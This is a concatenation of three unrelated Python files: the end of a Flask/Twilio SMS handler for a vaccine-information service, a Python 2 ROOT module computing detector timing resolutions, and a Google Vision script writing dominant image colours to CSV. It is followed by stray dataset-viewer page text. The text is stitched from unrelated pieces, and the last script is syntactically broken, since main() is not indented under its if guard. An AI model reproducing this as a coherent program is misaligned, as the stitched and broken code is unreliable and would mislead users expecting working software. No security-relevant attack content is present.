        user_info[phone_number] = [None, None, None, None, None, current_counter]
    print(user_info)
    #----------------------------------------------------------------------------
    return str(resp)
if __name__ == "__main__":
    # Flask development server; debug=True enables the reloader and tracebacks.
    app.run(debug=True)
# twilio phone-numbers:update PNe2a30ea94813c69a9856573f9a7e3b7d --sms-url http://localhost:5000/handle_sms
# from flask import Flask, request, redirect
# from twilio.twiml.messaging_response import MessagingResponse
#
# app = Flask(__name__)
#
# @app.route("/handle_sms", methods=['GET', 'POST'])
# def incoming_sms():
# """Send a dynamic reply to an incoming text message"""
# # Get the message the user sent our Twilio number
# body = request.values.get('Body', None)
#
# # Start our TwiML response
# resp = MessagingResponse()
#
# # Determine the right reply for this message
# if body:
# resp.message('Hi! Welcome to Vaccine Info Estimator, we are going to ask you a series of questions to determine'
# 'your estimated date to receive the vaccine.')
#
#
# return str(resp)
#
# if __name__ == "__main__":
# app.run(debug=True) |
import ROOT
import numpy as np
import itertools as it
import data_management as dm
import run_log_metadata as md
ROOT.gROOT.SetBatch(True)
# The function imports pulse files and creates timing resolution files with
# time differences used for timingPlots and trackingAnalysis.
def createTimingFiles(batchNumber):
    """Create the timing-resolution ROOT files (per-event time differences)
    for every run in *batchNumber*; consumed by timingPlots/trackingAnalysis.

    Python 2 module (print statements); style kept consistent with the file.
    """
    runNumbers = md.getAllRunNumbers(batchNumber)
    startTimeBatch = dm.getTime()
    print "\nBatch:", batchNumber, len(runNumbers), "run files.\n"
    for runNumber in runNumbers:
        md.defineRunInfo(md.getRowForRunNumber(runNumber))
        # Skip runs whose timing output cannot be produced.
        if not dm.checkIfFileAvailable("timing"):
            continue
        print "Run", runNumber, "\n"
        # Import files per run
        peak_time = dm.exportImportROOTData("pulse", "peak_time")
        cfd = dm.exportImportROOTData("pulse", "cfd")
        # Perform linear calculations
        time_diff_peak = getTimeDifferencePerRun(peak_time)
        time_diff_cfd = getTimeDifferencePerRun(cfd)
        # Export per run number linear
        dm.exportImportROOTData("timing", "normal_peak", time_diff_peak)
        dm.exportImportROOTData("timing", "normal_cfd", time_diff_cfd)
        # System-of-equations variant is skipped for batch group 6
        # (integer division on Python 2 maps runs 600-699 to 6).
        if batchNumber/100 != 6:
            # Perform calculations sys eq
            time_diff_peak_sys_eq = getTimeDifferencePerRunSysEq(peak_time)
            time_diff_cfd_sys_eq = getTimeDifferencePerRunSysEq(cfd)
            # Export per run number sys eq
            dm.exportImportROOTData("timing", "system_peak", time_diff_peak_sys_eq)
            dm.exportImportROOTData("timing", "system_cfd", time_diff_cfd_sys_eq)
        print "Done with run", runNumber, "\n"
    print "Done with batch", batchNumber, "Time analysing: "+str(dm.getTime()-startTimeBatch)+"\n"
# This takes the time difference between a DUT and the SiPM.
def getTimeDifferencePerRun(time_location):
    """Return per-event time differences between each DUT channel and the
    SiPM reference channel.

    time_location is a numpy structured array (one named column per channel,
    one row per event); a zero entry marks a missing time reconstruction.
    Values are scaled by 1000 -- ns to ps, per the [ps] convention used by
    the solver below.
    """
    time_difference = np.zeros(len(time_location), dtype = time_location.dtype)
    SiPM_chan = md.getChannelNameForSensor("SiPM-AFP")
    for chan in time_location.dtype.names:
        md.setChannelName(chan)
        # The SiPM is the reference; no difference against itself.
        if md.getSensor() == "SiPM-AFP":
            continue
        for event in range (0, len(time_location)):
            # Require a valid (non-zero) time in both channels.
            if time_location[SiPM_chan][event] != 0 and time_location[chan][event] != 0:
                time_difference[chan][event] = (time_location[chan][event] - time_location[SiPM_chan][event])*1000
    return time_difference
# This is used to produce ROOT files which have multiple solutions
# Note that the system of equations only applies to the first oscilloscope
# Reason: the first oscilloscope contains different sensors.
def getTimeDifferencePerRunSysEq(time_location):
    """Return per-event time differences between every channel pair of the
    first oscilloscope (chan0..chan3) for the system-of-equations method.

    For each channel, each event stores a 3-vector of differences against the
    other three channels (scaled by 1000; zero where either hit is missing).
    """
    dt = dm.getDTYPESysEq()
    time_difference = np.zeros(len(time_location), dtype = dt)
    # Only the first oscilloscope carries different sensors (see note above).
    channels_1st_oscilloscope = ["chan0", "chan1", "chan2", "chan3"]
    for chan in channels_1st_oscilloscope:
        # The partner channels: all first-oscilloscope channels except 'chan'.
        chan2_list = list(channels_1st_oscilloscope)
        chan2_list.remove(chan)
        for event in range(0, len(time_location[chan])):
            value = np.zeros(3)
            for index in range(0, len(chan2_list)):
                chan2 = chan2_list[index]
                # Require a valid (non-zero) time in both channels.
                if time_location[chan][event] != 0 and time_location[chan2][event] != 0:
                    value[index] = (time_location[chan][event] - time_location[chan2][event])*1000
            time_difference[chan][event] = value
    return time_difference
# The input are two matrices, one with widths (\sigma_{ij}) of time difference graphs between sensor i and j and
# corresponding errors from the fits (\Delta\sigma_{ij}).
# The output is the width of sensor i (\sigma_i) and corresponding error (\Delta\sigma{i}). All values in [ps].
def solveSystemOfEqs(sigma_convoluted_matrix, error_convoluted_matrix):
    """Solve for the individual sensor widths.

    Input: matrix of pairwise convoluted widths \\sigma_{ij} and the matrix of
    their fit errors \\Delta\\sigma_{ij}. Output: per-sensor widths \\sigma_i and
    errors \\Delta\\sigma_i, all in [ps]. Among all acceptable matrix
    combinations the solution with the largest summed resolution is kept.

    Bug fix: when no combination produced a non-negative squared solution,
    'sigma'/'error' were never assigned and the return raised
    UnboundLocalError; they now fall back to all-zero vectors.
    """
    matrices, inverses = possibleMatrices()
    # Fallback solution if every combination is rejected below.
    sigma = np.zeros(len(sigma_convoluted_matrix))
    error = np.zeros(len(error_convoluted_matrix))
    check_sum = 0
    for index in range(0, len(matrices)):
        matrix = matrices[index]
        matrix_inv = inverses[index]
        # Get \sigma_{i}
        sigma_convoluted_squared = np.power(matrix.dot(sigma_convoluted_matrix).diagonal(), 2)
        sigma_squared = matrix_inv.dot(sigma_convoluted_squared)
        # Negative squared widths are unphysical; skip this combination.
        if np.any(sigma_squared < 0):
            continue
        sigma_solution = np.sqrt(sigma_squared)
        # Get \Delta\sigma_{i}, note that the errors cannot be subtracted
        error_convoluted = matrix.dot(error_convoluted_matrix).diagonal()
        error_solution = abs(matrix_inv).dot(error_convoluted)
        # Select the solution with the largest sum of timing resolutions
        if check_sum < np.sum(sigma_solution):
            sigma = sigma_solution
            error = error_solution
            check_sum = np.sum(sigma_solution)
    return sigma, error
def getSigmasFromFit(TH1F_histogram, window_range, percentage):
    """Fit the time-difference histogram and return (sigma_DUT, fit error).

    The fit window is centred on the histogram maximum; the SiPM reference
    width is subtracted in quadrature. On a failed fit both values are 0.
    """
    # Change the window
    xMin = TH1F_histogram.GetXaxis().GetBinCenter(TH1F_histogram.GetMaximumBin()) - window_range
    xMax = TH1F_histogram.GetXaxis().GetBinCenter(TH1F_histogram.GetMaximumBin()) + window_range
    TH1F_histogram.SetAxisRange(xMin, xMax)
    # Set ranges to be at the positions of defined height
    value_limit = TH1F_histogram.GetMaximum() * (1.0 - percentage)
    xMin = TH1F_histogram.GetXaxis().GetBinCenter(TH1F_histogram.FindFirstBinAbove(value_limit))
    xMax = TH1F_histogram.GetXaxis().GetBinCenter(TH1F_histogram.FindLastBinAbove(value_limit))
    # Create fit function if the same oscilloscope
    if md.checkIfSameOscAsSiPM():
        fit_function = ROOT.TF1("gaus", "gaus", xMin, xMax)
    # Create fit function if different oscilloscope
    else:
        # For some double-peak distributions the highest peak have to be set for the fit
        # to function correctly. Change the bool accordingly!
        high_peak_at_left = True
        if high_peak_at_left:
            # In the case when the highest peak is at left
            amplitude_1 = TH1F_histogram.GetMaximum()
            bin_second_peak = TH1F_histogram.GetBinCenter(TH1F_histogram.GetMaximumBin())+100
            position_second_peak = TH1F_histogram.FindBin(bin_second_peak)
            amplitude_2 = TH1F_histogram.GetBinContent(position_second_peak)
        else:
            # In the case when the highest peak is at right.
            # Bug fix: this branch referenced the undefined names
            # bin_second_peak / position_second_peak and raised NameError.
            bin_first_peak = TH1F_histogram.GetBinCenter(TH1F_histogram.GetMaximumBin())-100
            position_first_peak = TH1F_histogram.FindBin(bin_first_peak)
            amplitude_1 = TH1F_histogram.GetBinContent(position_first_peak)
            amplitude_2 = TH1F_histogram.GetMaximum()
        # Double gaussian with a shared width and a fixed +100 peak separation.
        fit_function = ROOT.TF1("gaus", "[0]*exp(-0.5*((x-[1])/[2])^2) + [3]*exp(-0.5*((x-([1]+100))/[2])^2)", xMin, xMax)
        fit_function.SetParameters(amplitude_1, TH1F_histogram.GetMean(), TH1F_histogram.GetStdDev(), amplitude_2)
        fit_function.SetParNames("Constant1", "Mean1", "Sigma", "Constant2")
    try:
        # Create fit and calculate the width
        TH1F_histogram.Fit("gaus", "Q", "", xMin, xMax)
        th1_function = TH1F_histogram.GetFunction("gaus")
        sigma_fit = th1_function.GetParameter(2)
        sigma_fit_error = th1_function.GetParError(2)
        sigma_SiPM = md.getSigmaSiPM()
        # Subtract the SiPM reference width in quadrature.
        if sigma_fit > sigma_SiPM:
            sigma_DUT = np.sqrt(np.power(sigma_fit, 2) - np.power(sigma_SiPM, 2))
        else:
            sigma_DUT = 0
    # In case that the fit fails, due to no data, ignore the result.
    # (Narrowed from a bare except so KeyboardInterrupt etc. still propagate.)
    except Exception:
        sigma_DUT = 0
        sigma_fit_error = 0
    return sigma_DUT, sigma_fit_error
# Calculate all 4x4 matrices which have diagonal elements
def possibleMatrices():
    """Enumerate invertible 4x4 0/1 systems built from sensor-pair rows.

    Each row of ``possible_combinations`` marks a pair of sensors (i, j)
    between which a width can be extracted. A valid system matrix is an
    ordered selection of four distinct rows such that every diagonal entry
    is 1 (sensor i contributes to equation i) and the matrix is invertible.

    Returns:
        Tuple ``(matrices, inverses)`` of equally long lists, where
        ``inverses[k]`` is the matrix inverse of ``matrices[k]``.
    """
    # The arrays indicate the possible ways to extract the width between sensor i and j.
    possible_combinations = np.array([[1, 1, 0, 0], [1, 0, 1, 0], [1, 0, 0, 1],
                                      [0, 1, 1, 0], [0, 1, 0, 1], [0, 0, 1, 1]])
    matrices = []
    inverses = []
    # it.permutations yields every ordered pick of 4 distinct rows; no need
    # to materialize the whole list first.
    for combination in it.permutations(possible_combinations, 4):
        matrix = np.array(combination)
        # Require that the matrix have diagonal elements (all ones on the
        # diagonal) BEFORE paying for the inversion attempt.
        if np.sum(matrix.diagonal()) != 4:
            continue
        try:
            inverse = np.linalg.inv(matrix)
        except np.linalg.LinAlgError:
            # Singular combination (linearly dependent sensor pairs): skip.
            # The original bare "except:" also hid unrelated errors.
            continue
        matrices.append(matrix)
        inverses.append(inverse)
    return matrices, inverses
|
from pathlib import Path
import json
import csv
import time
def detect_properties(path):
    """Detect dominant-color image properties of one file via Google Vision.

    Args:
        path: Filesystem path (string or Path) of the image to analyse.

    Returns:
        A flat CSV row: ``[filename, r, g, b, score, pixel_fraction, ...]``
        with one five-value group per dominant color the API reports.
    """
    # Imported lazily so the module can be imported without the
    # google-cloud-vision dependency installed.
    from google.cloud import vision

    client = vision.ImageAnnotatorClient()
    path = Path(path)
    # read_bytes() replaces the manual io.open/read/close dance; the dead
    # "response = []" placeholder of the original is gone - it was
    # immediately overwritten by the API call.
    image = vision.Image(content=path.read_bytes())
    response = client.image_properties(image=image)

    print(f'Processing image {path.name}')
    row = [path.name]
    # Flatten each dominant color into five CSV columns.
    for color in response.image_properties_annotation.dominant_colors.colors:
        row.extend([color.color.red, color.color.green, color.color.blue,
                    color.score, color.pixel_fraction])
    return row
def main():
    """Scan ./images for PNGs, fetch color properties for each, and write results.csv."""
    pathlist = Path('./images').glob('**/*.png')
    count = 0
    # newline='' is required by the csv module; without it every row is
    # followed by a blank line on Windows.
    with open('results.csv', mode='w', newline='') as results_file:
        results_writer = csv.writer(results_file, delimiter=',', quotechar='"',
                                    quoting=csv.QUOTE_MINIMAL)
        # Header: filename plus five columns per dominant color, 10 colors max.
        cols = ['file']
        for i in range(1, 11):
            cols.extend([f'r{i}', f'g{i}', f'b{i}', f'score{i}', f'pixelfraction{i}'])
        results_writer.writerow(cols)
        for path in pathlist:
            print(f'processing image {count+1}')
            row = detect_properties(str(path))
            results_writer.writerow(row)
            # Crude rate limiting against the Vision API.
            time.sleep(1)
            count += 1
    print(f'Total Images: {count}')
# Run the batch job only when executed as a script, not on import.
if __name__ == "__main__":
main()
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.